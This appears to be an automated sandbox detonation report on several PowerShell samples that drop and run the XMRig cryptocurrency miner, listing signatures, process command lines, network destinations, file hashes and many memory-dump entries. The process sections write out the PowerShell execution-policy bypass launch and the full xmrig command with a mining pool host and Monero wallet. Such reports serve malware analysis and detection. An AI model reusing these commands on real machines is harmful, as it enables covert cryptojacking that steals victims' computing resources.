memory/4268-126-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-127-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-128-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-129-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-130-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-131-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-132-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-133-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-134-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-135-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-136-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-137-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-138-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-139-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-140-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-141-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-142-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-143-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-144-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-145-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-146-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-147-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-148-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-149-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-150-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-151-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-152-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-153-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-154-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-155-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-156-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-157-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:50

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

memory/5024-0-0x00007FF90B123000-0x00007FF90B125000-memory.dmp

memory/5024-1-0x0000023E1F6C0000-0x0000023E1F6E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2aruylhc.fwa.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5024-11-0x00007FF90B120000-0x00007FF90BBE1000-memory.dmp

memory/5024-12-0x00007FF90B120000-0x00007FF90BBE1000-memory.dmp

memory/5024-14-0x00007FF90B120000-0x00007FF90BBE1000-memory.dmp

memory/5024-15-0x0000023E38800000-0x0000023E38812000-memory.dmp

memory/5024-16-0x0000023E38560000-0x0000023E3856A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/704-47-0x00000265066B0000-0x00000265066D0000-memory.dmp

memory/704-48-0x0000026507EB0000-0x0000026507ED0000-memory.dmp

memory/704-49-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/5024-50-0x00007FF90B120000-0x00007FF90BBE1000-memory.dmp

memory/5024-51-0x00007FF90B123000-0x00007FF90B125000-memory.dmp

memory/704-52-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/5024-53-0x00007FF90B120000-0x00007FF90BBE1000-memory.dmp

memory/704-55-0x000002659AAA0000-0x000002659AAC0000-memory.dmp

memory/704-54-0x0000026507ED0000-0x0000026507EF0000-memory.dmp

memory/704-56-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/5024-57-0x00007FF90B120000-0x00007FF90BBE1000-memory.dmp

memory/704-58-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-59-0x0000026507ED0000-0x0000026507EF0000-memory.dmp

memory/704-60-0x000002659AAA0000-0x000002659AAC0000-memory.dmp

memory/704-61-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-62-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-63-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-64-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-65-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-66-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-67-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-68-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-69-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-70-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-71-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-72-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-73-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-74-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-75-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-76-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-77-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-78-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-79-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-80-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-81-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-82-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-83-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-84-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-85-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-86-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-87-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-88-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-89-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-90-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-91-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-92-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-93-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-94-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-95-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-96-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-97-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-98-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-99-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-100-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-101-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-102-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-103-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-104-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-105-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-106-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-107-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-108-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-109-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-110-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-111-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-112-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-113-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-114-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-115-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-116-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-117-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-118-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-119-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:53

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1744s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/4676-4-0x00007FFFC2E03000-0x00007FFFC2E04000-memory.dmp

memory/4676-5-0x0000023BFA4D0000-0x0000023BFA4F2000-memory.dmp

memory/4676-9-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-10-0x0000023BFAFC0000-0x0000023BFB036000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ab2s4f30.zws.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4676-11-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-26-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-49-0x0000023BFAFA0000-0x0000023BFAFB2000-memory.dmp

memory/4676-62-0x0000023BFAF80000-0x0000023BFAF8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4544-91-0x0000028650CF0000-0x0000028650D10000-memory.dmp

memory/4544-92-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-93-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4676-94-0x00007FFFC2E03000-0x00007FFFC2E04000-memory.dmp

memory/4676-95-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-96-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4544-97-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-98-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-99-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-100-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-101-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-102-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-103-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-104-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-105-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-106-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-107-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-108-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-109-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-110-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-111-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-112-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-113-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-114-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-115-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-116-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-117-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-118-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-119-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-120-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-121-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-122-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-123-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-124-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-125-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-126-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-127-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-128-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-129-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-130-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-131-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-132-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-133-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-134-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-135-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-136-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-137-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-138-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-139-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-140-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-141-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-142-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-143-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-144-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-145-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-146-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-147-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-148-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-149-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-150-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-151-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-152-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-153-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-154-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-155-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-156-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-157-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 03:40

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 rows, all with empty columns)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp

Files

memory/4192-3-0x00007FFB5D423000-0x00007FFB5D424000-memory.dmp

memory/4192-5-0x0000028F7F4E0000-0x0000028F7F502000-memory.dmp

memory/4192-7-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

memory/4192-9-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

memory/4192-10-0x0000028F7FB40000-0x0000028F7FBB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zdfy5fgg.ojr.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4192-25-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

memory/4192-48-0x0000028F18020000-0x0000028F18032000-memory.dmp

memory/4192-61-0x0000028F18010000-0x0000028F1801A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4268-90-0x000001BE70EE0000-0x000001BE70F00000-memory.dmp

memory/4268-91-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4192-93-0x00007FFB5D423000-0x00007FFB5D424000-memory.dmp

memory/4268-92-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4192-94-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

memory/4192-95-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

memory/4268-96-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-97-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-98-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-99-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-100-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-101-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-102-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-103-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-104-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-105-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-106-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-107-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-108-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-109-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-110-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-111-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-112-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-113-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-114-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-115-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-116-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-117-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-118-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-119-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-120-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-121-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-122-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-123-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-124-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-125-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-126-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-127-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-128-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

